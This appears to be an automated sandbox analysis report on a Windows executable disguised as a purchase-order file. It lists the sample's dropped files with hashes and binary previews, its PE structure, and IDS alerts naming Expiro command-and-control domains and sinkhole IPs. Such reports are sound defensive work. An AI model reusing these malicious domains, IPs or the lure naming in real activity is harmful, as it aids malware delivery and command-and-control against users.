                                                                                                                                                                                                                                    Preview:...K..=1o.._....Ey.2......gh[N~J.SY.uD...~..|+-.....w.....m.N.j[9.....N".o..s..!x.1}Q..=.$....+.?v[....l{.Y.nr0...t.....6<.n..z....0L......k.I......!.....F....a.J...k@......u.H.7..p..5$.9.W9.B.La6...U........"l7i...)......x...f.>..!..w`M].f[........d..m..\.kp.f......].-s...J........o^.%.Y..k]....hG......m.@d.4....=..dM-...k-.....Yp..T..Q......`H*..e+3...E..:.n.<J(j'......,%@ofHR{..z....vw?.N...Wb.FP...0....=^.`.[_..9..\..$D.u1_.t=....%.D.K.sx.<.o^.{-...A......{.h?..Q..p..i..*SV..>...z.6U"...uB..;.).3F#..(?....0y...4..N.=....zM..'..8X...c|....{.^.X...m<.]..=.L......._.P.c=...~r............+7..,.._..I.^......r\?...hx....k..;.Q....g..:..QV<..8z..T.kT..Q........j..9.../rU..)".Ey...R..^.%i......G..^o.WI.........}.........:.3cM.p.-..P.....Y|NT.r...8.L.o(...h.X.JRQU......1.}.'8.+A.S.R.u....x..n..*..O..'j...k...i..T....&L.P.r.g.f.y..tpQ...Km^.......D../.A?...R...T.....u.b..x>z.LD...b..d._.C......d..<....2.;.w.7j.z....*.GMj.:..g%.B.L.....-k[n.6
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1442304
                                                                                                                                                                                                                                    Entropy (8bit):7.980248681174446
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:K5h0WNJ6H+ZIxFu1Zv4bteRJ9or8SM9UuoPzKn6St0KPLbQebMxQqjts19g:WrK+Zkbt6J9ooSxuow6aJMepQODg
                                                                                                                                                                                                                                    MD5:C12317B003EBC503C85BAB87C2104120
                                                                                                                                                                                                                                    SHA1:71C988096FFBE3E4B6D9976FEE29427C9BDBF23F
                                                                                                                                                                                                                                    SHA-256:5454862EE4069DF3D2058763AB8D8E01ABB4114E628F32305817F31F0AD1FE83
                                                                                                                                                                                                                                    SHA-512:4123659F72EC605015E9210F456C6BB22DFBCF032756649323124834D45009405B02662FC778403C696FEB2DBA7ADA7562A77C068645AA1D8B5B952452D079C1
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg.....................4........... ........@.. .......................`............`.................................l...O........2...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....2.......2..................@..@.reloc.......@......................@..B........................H.......@...,?......K....................................................0..A....... .........%.....(......... 0........%.A...(.....B...(l...*.....&*....0..m........s_...}........{......}4.......{......u....}5.....}.....(.....(.....{....{5.... ..7!..........(L... {..7!..........(L...~....%-.&~..........s....%.....(...+(...+~....%-.&~..........s....%.....(...+.......%..t....(...+s.....%. `..7!..........(L....%. _..7!..........(L..........(.... U..7!..........(L... ...........
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1348608
                                                                                                                                                                                                                                    Entropy (8bit):7.253782258251028
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:bQW4qoNUgslKNX0Ip0MgHCpoMBOuLsqjnhMgeiCl7G0nehbGZpbD:bQW9BKNX0IPgiKMBOu/Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:1B7D1BBDA98AC1FED8DBC0B99926E47C
                                                                                                                                                                                                                                    SHA1:71E74E2D3FFC2EE730490A25E7EA95C4B893F67A
                                                                                                                                                                                                                                    SHA-256:E5502217685B9236926BF9E697BDEA149F0A20103E3AD373E72891DD792B6079
                                                                                                                                                                                                                                    SHA-512:23511DB3BEC5BEF16E9BED0CC955E2C97DA03ECE2A04909A59B19687E97C4FB31363CB6299C5654F08616EEC0C221BBD28E1197A0355A5DB4E7F4263219AA3DE
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1224192
                                                                                                                                                                                                                                    Entropy (8bit):5.163564930443691
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:H2G7AbHjkUsqjnhMgeiCl7G0nehbGZpbD:H2G7AbHjpDmg27RnWGj
                                                                                                                                                                                                                                    MD5:3315FC504BE337D6BBF6B1267C85845B
                                                                                                                                                                                                                                    SHA1:8000C566A8DD512B3B400C4654292C51ADB6F76B
                                                                                                                                                                                                                                    SHA-256:B08B273C46F13D511B380DD9C7F5B3A1790311FC6DF3FA2DD4D56FC1B0D3BD50
                                                                                                                                                                                                                                    SHA-512:E0007C417B5AA760E26E34841DB057C6BA2B5B049158746B993C3330FC1001194C43F073A9CD367539F1845E30AE77CCF423921948EC3EB53EC9740D8EC3170A
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................>.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1242624
                                                                                                                                                                                                                                    Entropy (8bit):7.28897072771141
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:HkdpSI+K3S/GWei+qNv2uG3MsqjnhMgeiCl7G0nehbGZpbD:H6SIGGWei2uG34Dmg27RnWGj
                                                                                                                                                                                                                                    MD5:AC7FF2F8D7B75603AD58755D5762D640
                                                                                                                                                                                                                                    SHA1:E3695470D1C09329DB4B484C30FFD16F00712939
                                                                                                                                                                                                                                    SHA-256:646B61FBE87FD7560FB802EADF0E076156A1DF92FA18AB1318B0BE7473DC5734
                                                                                                                                                                                                                                    SHA-512:80C1ED0597763839F756AB1F9D572E5E7E0FBA881B252874F265485CF46517D1854E69E97342C362E79004D30519CC6C91C1A947F5E9A706A703C4F3E780D86B
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......i..... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1225728
                                                                                                                                                                                                                                    Entropy (8bit):5.163318864669806
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:yEP3R69Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:x69sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                    MD5:73A5E8C4C9FBA1AD14C07468F41BFB78
                                                                                                                                                                                                                                    SHA1:6B9FF1F0F477BD462FE191C6AEFAB9F1ACE4A6D8
                                                                                                                                                                                                                                    SHA-256:FF40D2401E7D53BC70F1A0F036B4EED6DDE91B9A3D34188333BBDDEC7CFE029E
                                                                                                                                                                                                                                    SHA-512:CB6B0A4BFB23B4BB6B1F8AE93CC81A1F8FB98CEF59F85F9A1046FD1ECE17AA72C4C61B9CF87F989CF059C5B6D3AE63F78F3BEBB07038FF8E3AD450C9EEC5BC9B
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                                                    Entropy (8bit):7.984333322955903
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:zjqzoRHcaP3uXpDybiDXRA5W3D6Kp+MaeT9aQyAh+:zGsVcE3OpDymTRA5dKp+MjT9aUA
                                                                                                                                                                                                                                    MD5:BA2D0DF3DF692126FAE7D7D20B42E28C
                                                                                                                                                                                                                                    SHA1:620B0C217EE1F7B771D174B193F100ED64CDDD5C
                                                                                                                                                                                                                                    SHA-256:43594815812C26EB284EEB36EC04F2705857FAEC000F3EEEA9A66CE3F47AE33A
                                                                                                                                                                                                                                    SHA-512:71CFCCDEDDE5CE5974C92EBDDBD89D58D78A34DE1BE4A1CD7F4C06D5C8D5CB244DE78F245F41E6EF406A9EB3D2C3C10DE50EC48C2E8450D1354AF235834C7C0D
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:8CZ ....]<..b....BQca..g.+&.w.#....Wv\.....E.......,U..&o...%.0j.......1.O.w...... y.v.+.,c.?.*y.I.e...>......f.vP>......>n3..tv.wP.....rT....i...f.....t..d=........L.j.pD...B..c....;5cM .;>_.$D....}c.nc<.Jw>.r..NJ.i..{E..v.......q.T !s54..............>.+.G... `...\?9....*.....4....;.......m.;...P..].V.6.B;_.C.Xr.......>....&...P....O.t\F8...t{....../.kMX.=D.......E".rq..~.r....P.VI...-...$4L.8.rW....Pd.V.....{..e..7.....e*.V...5........K...e...'.@|2....I...3.....T....g/[4H.iy......2QJ.......8..X#?....Q.C.x.#?.9...'...2..B.../,Enn\.....XT.&.$...?.[rJ.U..k..........E}..E.:.\...L)B....~..R:..eX>.IMmn.'5..YYy)=.V..............&......qfwj....R..Q..1.4SR....UJf2.....Y..!....A.!.j1...._....i5.........T/..Q.|..tg.>..B{p{.nv.m...b#.v.j4..K.(...........-..0.......L..:lf...c...A...Y"K'.9.cj...I......I..<w..bY+..E".. ....H...F;...b..!..'n..,.....$'?f.>.}.....~.-t...v.,...0.x.m.c..H.u2rt..~:...s9.....-o .......j...{jzr3.'n$/...qE&..5....:...qI.z{:.!..&.<i
                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):7.980248681174446
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                    File name:PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    File size:1'442'304 bytes
                                                                                                                                                                                                                                    MD5:c12317b003ebc503c85bab87c2104120
                                                                                                                                                                                                                                    SHA1:71c988096ffbe3e4b6d9976fee29427c9bdbf23f
                                                                                                                                                                                                                                    SHA256:5454862ee4069df3d2058763ab8d8e01abb4114e628f32305817f31f0ad1fe83
                                                                                                                                                                                                                                    SHA512:4123659f72ec605015e9210f456c6bb22dfbcf032756649323124834d45009405b02662fc778403c696feb2dba7ada7562a77c068645aa1d8b5b952452d079c1
                                                                                                                                                                                                                                    SSDEEP:24576:K5h0WNJ6H+ZIxFu1Zv4bteRJ9or8SM9UuoPzKn6St0KPLbQebMxQqjts19g:WrK+Zkbt6J9ooSxuow6aJMepQODg
                                                                                                                                                                                                                                    TLSH:556533CDECA7A111CA8C6F7AC863085441F09767F062F20908A69D799F99BE447EFD13
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg.....................4........... ........@.. .......................`............`................................
                                                                                                                                                                                                                                    Icon Hash:16bb2d4d6ccc6593
                                                                                                                                                                                                                                    Entrypoint:0x55ebbe
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x6772CEF8 [Mon Dec 30 16:48:56 2024 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x15eb6c0x4f.text
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1600000x3200.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1640000xc.reloc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x20000x15cbc40x15cc002bde33f7981469f355e134a75c92f90aFalse0.9793892809139785data7.982441629282343IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rsrc0x1600000x32000x32009726b8590865a2701a5707ef223a5685False0.941953125data7.778335987550486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .reloc0x1640000xc0x200796c0a2753d9492fd1df3b70d1909b60False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x1600c80x2d81PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9937333676710447
                                                                                                                                                                                                                                    RT_GROUP_ICON0x162e5c0x14data1.05
                                                                                                                                                                                                                                    RT_VERSION0x162e800x30cdata0.43333333333333335
                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    mscoree.dll_CorExeMain
                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                    2024-12-31T09:05:07.955302+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.449739TCP
                                                                                                                                                                                                                                    2024-12-31T09:05:07.955302+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.449739TCP
                                                                                                                                                                                                                                    2024-12-31T09:05:09.556816+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.449742TCP
                                                                                                                                                                                                                                    2024-12-31T09:05:09.556816+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.449742TCP
                                                                                                                                                                                                                                    2024-12-31T09:05:11.324424+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.449745TCP
                                                                                                                                                                                                                                    2024-12-31T09:05:11.324424+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.449745TCP
                                                                                                                                                                                                                                    2024-12-31T09:05:11.347551+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4574181.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-31T09:05:14.023229+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4633971.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-31T09:05:20.949994+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741132.226.8.16980TCP
                                                                                                                                                                                                                                    2024-12-31T09:05:29.912750+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4511791.1.1.153UDP
                                                                                                                                                                                                                                    2024-12-31T09:05:30.561464+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44975772.52.178.2380TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:04.494974+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.449789TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:04.494974+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.449789TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:06.454454+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.449800TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:06.454454+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.449800TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:11.794660+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.449841TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:11.794660+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.449841TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:12.339406+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.227.7.13880192.168.2.449847TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:12.339406+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.227.7.13880192.168.2.449847TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:17.574514+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.449883TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:17.574514+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.449883TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:18.396184+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.449891TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:18.396184+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.449891TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:24.548434+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.449927TCP
                                                                                                                                                                                                                                    2024-12-31T09:06:24.548434+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.449927TCP
